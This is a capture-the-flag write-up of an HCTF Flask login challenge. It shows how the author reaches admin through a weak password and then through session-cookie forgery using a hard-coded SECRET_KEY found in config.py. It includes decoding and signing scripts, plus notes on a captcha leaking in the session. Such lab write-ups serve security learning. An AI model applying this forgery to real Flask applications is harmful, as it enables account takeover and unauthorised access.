The first step is to open the website; in the drop-down menu next to the welcome page there is a login and registration interface.
Check the source code.
There is a comment that prompts us to log in with the admin account.
Register any account; after logging in successfully, there are three interfaces.
Just take a look, and first go to the login/registration page to try whether there is any injection.
I tried a constraint attack on the registration interface, and I just entered 123 as the password; I didn't understand the seriousness of the matter at that time. It reported an error, but it didn't seem to work. But this interface can still run Python and you can see some things. It feels like it can be used, but it should be too difficult for me. First look elsewhere.
Return to the login interface and try admin / 123.
Fuck, in???
At this moment I was a little bit stunned: what's going on, did the injection succeed? Wasn't it an error? Then I tried again with the password changed. Sure enough, it didn't work. It seems that the admin password really is 123. /vomits blood
I can give a suggestion here: since the knowledge point here is not brute-forcing, let's make the password more complicated...
Just go and read the big guy's writeup (wp).
The boss said that there are three solutions, so I tried the first one:
Flask session forgery
Unicode deception
Race condition
It turns out that you can see the URL of the source code when you change the password.
Solution 1: Forge the Flask session
For Flask's session mechanism, you can refer to this article: Flask source code analysis: session
For client session issues, you can refer to this article: Security issues caused by client session
Decoding script (a Flask session is signed, not encrypted, so no key is needed to read it)
#!/usr/bin/env python3
# Decodes a Flask session cookie. Flask sessions are only signed, so the
# payload is readable without SECRET_KEY; only forging a cookie needs the key.
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    # cookie layout: payload.timestamp.signature
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)
    decompress = False
    # a leading '.' marks a zlib-compressed payload
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True
    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')
    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')
    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))
index.html
{% include('header.html') %}
{% if current_user.is_authenticated %}
<h1 class="nav">Hello {{ session['name'] }}</h1>
{% endif %}
{% if current_user.is_authenticated and session['name'] == 'admin' %}
<h1 class="nav">hctf{xxxxxxxxx}</h1>
{% endif %}
<!-- you are not admin -->
<h1 class="nav">Welcome to hctf</h1>
{% include('footer.html') %}
You can see that the flag is displayed when the name stored in the session is admin.
To forge the session we also need SECRET_KEY; the key can be found in config.py:
import os

class Config(object):
    # hard-coded fallback key: anyone who reads this file can sign sessions
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True
Flask session forging script
https://github.com/noraj/flask-session-cookie-manager
Sign a session with name set to admin using SECRET_KEY, put it in the cookie, and send the request to get the flag.
I only tested enough to understand the first method and did not try the second solution. The third solution is said to be only theoretical.
However, when I looked things up, I found that this framework also has the problem of leaking the verification code.
Decode the session obtained from the registration interface, and you can see that the verification code is in the session.
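As an added example (not code from the original writeup or from flask-session-cookie-manager), this standard-library script shows why both the captcha leak and the forgery above work: the cookie is only signed, so decode_session reads it without any key, while verify_session shows that the HMAC over it can only be checked, or produced, with SECRET_KEY. It reproduces Flask's default cookie format (itsdangerous, HMAC-SHA1, salt "cookie-session"); the sample cookie is constructed inline with the page's key ckj123, and sign_session exists only to build that sample.

```python
# Flask session cookie = base64url(json) . base64url(timestamp) . base64url(HMAC-SHA1)
# signed by itsdangerous with the derived key HMAC-SHA1(SECRET_KEY, b"cookie-session").
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"  # fixed salt Flask uses for the session cookie

def b64e(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64d(data: str) -> bytes:
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))

def decode_session(cookie: str) -> dict:
    """Read the payload WITHOUT the key: anyone holding the cookie can do this."""
    payload = cookie.rsplit(".", 2)[0]
    raw = b64d(payload.lstrip("."))
    if payload.startswith("."):
        raw = zlib.decompress(raw)  # a leading '.' marks a zlib-compressed payload
    return json.loads(raw)

def derive_key(secret_key: str) -> bytes:
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()

def sign_session(data: dict, secret_key: str, ts: Optional[int] = None) -> str:
    """Build a cookie the way Flask does (without the optional zlib branch); sample only."""
    ts = int(time.time()) if ts is None else ts
    ts_bytes = ts.to_bytes(max(1, (ts.bit_length() + 7) // 8), "big")
    value = b64e(json.dumps(data, separators=(",", ":")).encode()) + "." + b64e(ts_bytes)
    sig = hmac.new(derive_key(secret_key), value.encode(), hashlib.sha1).digest()
    return value + "." + b64e(sig)

def verify_session(cookie: str, secret_key: str) -> bool:
    """Constant-time check that the cookie was signed with secret_key."""
    value, sig = cookie.rsplit(".", 1)
    expected = hmac.new(derive_key(secret_key), value.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, b64d(sig))

# Constructed sample: a registration-stage session that carries the captcha in clear.
SAMPLE_COOKIE = sign_session({"name": "guest", "captcha": "1234"}, "ckj123", ts=1700000000)
```

Running decode_session on SAMPLE_COOKIE returns the captcha without the key, which is exactly the leak described above; the fix is to keep the captcha server-side or store only its hash in the session, and to set SECRET_KEY from the environment rather than a guessable fallback.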